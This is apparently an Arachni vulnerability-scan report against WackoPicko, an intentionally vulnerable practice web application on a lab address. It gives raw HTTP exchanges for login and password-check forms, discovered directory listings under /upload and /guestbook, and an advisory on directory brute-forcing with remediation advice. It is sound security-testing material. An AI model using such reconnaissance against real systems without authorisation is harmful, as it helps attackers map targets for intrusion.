<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-23 first last">
<h2>Login</h2>
<table style="width:320px" cellspacing="0">
<form action="/WackoPicko/users/login.php" method="POST">
<tr><td>Username :</td><td> <input type="text" name="username" /></td></tr>
<tr><td>Password :</td><td> <input type="password" name="password" /></td></tr>
<tr><td><input type="submit" value="login" /></td><td> <a href="/WackoPicko/users/register.php">Register</a></td></tr>
</form>
</table>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
Raw HTTP request used to retrieve the page.
GET /WackoPicko/users/login.php HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 303 See Other
Date: Mon, 06 Aug 2018 22:50:41 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: /WackoPicko/users/login.php
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20
Content-Type: text/html
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:50:41 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 958
Content-Type: text/html
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-23 first last">
<h2>Login</h2>
<table style="width:320px" cellspacing="0">
<form action="/WackoPicko/users/login.php" method="POST">
<tr><td>Username :</td><td> <input type="text" name="username" /></td></tr>
<tr><td>Password :</td><td> <input type="password" name="password" /></td></tr>
<tr><td><input type="submit" value="login" /></td><td> <a href="/WackoPicko/users/register.php">Register</a></td></tr>
</form>
</table>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
form
with inputs
password
using
GET
at
http://192.168.0.26/WackoPicko/passcheck.php
pointing to
http://192.168.0.26/WackoPicko/passcheck.php
.
0 1 2 3 4 5 6 7 8 9 10 | <form action="/WackoPicko/passcheck.php" method="POST"> Password to check: <br> </br> <input type="password" name="password"> </input> <br> </br> <input type="submit" value="Check!"> </input> </form> |
| Type | In | Action | Default inputs | Updated inputs |
|---|---|---|---|---|
form |
http://192.168.0.26/WackoPicko/passcheck.php | http://192.168.0.26/WackoPicko/passcheck.php |
|
|
Raw HTTP request used to retrieve the page.
GET /WackoPicko/passcheck.php HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=d5mejo5kr6efhtf1dlak7b04m1
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:55:10 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 910
Content-Type: text/html
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last">
<h2>Check your password strength</h2>
<form action="/WackoPicko/passcheck.php" method="POST">
Password to check: <br>
<input type="password" name="password" /><br>
<input type="submit" value="Check!" />
</form>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
Raw HTTP request used to retrieve the page.
GET /WackoPicko/passcheck.php HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=d5mejo5kr6efhtf1dlak7b04m1
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:55:10 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 910
Content-Type: text/html
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last">
<h2>Check your password strength</h2>
<form action="/WackoPicko/passcheck.php" method="POST">
Password to check: <br>
<input type="password" name="password" /><br>
<input type="submit" value="Check!" />
</form>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
form
with inputs
adminname
password
using
GET
at
http://192.168.0.26/WackoPicko/admin/index.php?page=login
pointing to
http://192.168.0.26/WackoPicko/admin/index.php?page=login
.
0 1 2 3 4 5 6 7 8 9 10 11 12 13 | <form action="/WackoPicko/admin/index.php?page=login" method="POST"> Username : <input type="text" name="adminname"> </input> <br> </br> Password : <input type="password" name="password"> </input> <br> </br> <input type="submit" value="submit"> </input> </form> |
| Type | In | Action | Default inputs | Updated inputs |
|---|---|---|---|---|
form |
http://192.168.0.26/WackoPicko/admin/index.php?page=login | http://192.168.0.26/WackoPicko/admin/index.php?page=login |
|
|
Raw HTTP request used to retrieve the page.
GET /WackoPicko/admin/index.php?page=login HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=qfbf2kvl5dcva1si172s0r7c64
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:51:44 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 186
Content-Type: text/html
<h2>Admin Area</h2>
<form action="/WackoPicko/admin/index.php?page=login" method="POST">
Username : <input type="text" name="adminname" /><br>
Password : <input type="password" name="password" /><br>
<input type="submit" value="submit" />
</form>
Raw HTTP request used to retrieve the page.
GET /WackoPicko/admin/index.php?page=login HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=qfbf2kvl5dcva1si172s0r7c64
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:51:44 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 186
Content-Type: text/html
<h2>Admin Area</h2>
<form action="/WackoPicko/admin/index.php?page=login" method="POST">
Username : <input type="text" name="adminname" /><br>
Password : <input type="password" name="password" /><br>
<input type="submit" value="submit" />
</form>
Web applications are often made up of multiple files and directories.
It is possible that over time some directories may become unreferenced (unused) by the web application and forgotten about by the administrator/developer. Because web applications are built using common frameworks, they contain common directories that can be discovered (independent of server).
During the initial recon stages of an attack, cyber-criminals will attempt to locate unreferenced directories in the hope that the directory will assist in further compromise of the web application. To achieve this they will make thousands of requests using word lists containing common names. The response headers from the server will then indicate if the directory exists.
Arachni also contains a list of common directory names which it will attempt to access.
If directories are unreferenced then they should be removed from the web root and/or the application directory.
Preventing access without authentication may also be an option and can stop a client from being able to view the contents of a file, however it is still likely that the directory structure will be able to be discovered.
Using obscure directory names is implementing security through obscurity and is not a recommended option.
server
using
GET
at
http://192.168.0.26/WackoPicko/upload/testing/
pointing to
http://192.168.0.26/WackoPicko/upload/testing/
.
| Type | In | Action |
|---|---|---|
server |
http://192.168.0.26/WackoPicko/upload/testing/ | http://192.168.0.26/WackoPicko/upload/testing/ |
Raw HTTP request used to retrieve the page.
GET /WackoPicko/upload/testing/ HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=qfbf2kvl5dcva1si172s0r7c64
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:51:24 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 422
Content-Type: text/html;charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /WackoPicko/upload/testing</title>
</head>
<body>
<h1>Index of /WackoPicko/upload/testing</h1>
<table><tr><th><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr><tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[DIR]"></td><td><a href="/WackoPicko/upload/">Parent Directory</a></td><td> </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="again">again</a></td><td align="right">17-May-2011 21:25 </td><td align="right"> 47K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="gfhhg">gfhhg</a></td><td align="right">17-May-2011 21:25 </td><td align="right"> 47K</td><td> </td></tr>
<tr><th colspan="5"><hr></th></tr>
</table>
</body></html>
Raw HTTP request used to retrieve the page.
GET /WackoPicko/upload/ HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 580
Content-Type: text/html;charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /WackoPicko/upload</title>
</head>
<body>
<h1>Index of /WackoPicko/upload</h1>
<table><tr><th><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr><tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[DIR]"></td><td><a href="/WackoPicko/">Parent Directory</a></td><td> </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="3/">3/</a></td><td align="right">17-May-2011 21:25 </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="againIxwsed">againIxwsed</a></td><td align="right">17-May-2011 21:25 </td><td align="right"> 47K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="againiJ42nH">againiJ42nH</a></td><td align="right">17-May-2011 21:25 </td><td align="right"> 47K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="doggie/">doggie/</a></td><td align="right">17-May-2011 21:25 </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="flowers/">flowers/</a></td><td align="right">17-May-2011 21:25 </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="foos/">foos/</a></td><td align="right">17-May-2011 21:25 </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="house/">house/</a></td><td align="right">17-May-2011 21:25 </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="quarters/">quarters/</a></td><td align="right">17-May-2011 21:25 </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="testing/">testing/</a></td><td align="right">17-May-2011 21:25 </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="toga/">toga/</a></td><td align="right">17-May-2011 21:25 </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="twister/">twister/</a></td><td align="right">17-May-2011 21:25 </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="twister_funeXz3uM">twister_funeXz3uM</a></td><td align="right">17-May-2011 21:25 </td><td align="right"> 47K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="twister_funxJObBz">twister_funxJObBz</a></td><td align="right">17-May-2011 21:25 </td><td align="right"> 47K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="waterfall/">waterfall/</a></td><td align="right">17-May-2011 21:25 </td><td align="right"> - </td><td> </td></tr>
<tr><th colspan="5"><hr></th></tr>
</table>
</body></html>
server
using
GET
at
http://192.168.0.26/WackoPicko/guestbook/
pointing to
http://192.168.0.26/WackoPicko/guestbook/
.
| Type | In | Action |
|---|---|---|
server |
http://192.168.0.26/WackoPicko/guestbook/ | http://192.168.0.26/WackoPicko/guestbook/ |
Raw HTTP request used to retrieve the page.
GET /WackoPicko/guestbook/ HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 978
Content-Type: text/html
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class="current"><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last">
<h2>Guestbook</h2>
<h4>See what people are saying about us!</h4>
<p class="comment">Hi, I love your site!</p>
<p> - by adam </p>
<form action="/WackoPicko/guestbook.php" method="POST">
Name: <br>
<input type="text" name="name" /><br>
Comment: <br>
<textarea id="comment-box" name="comment"></textarea> <br>
<input type="submit" value="Submit" />
</form>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
Raw HTTP request used to retrieve the page.
GET /WackoPicko/ HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html
<html>
<head>
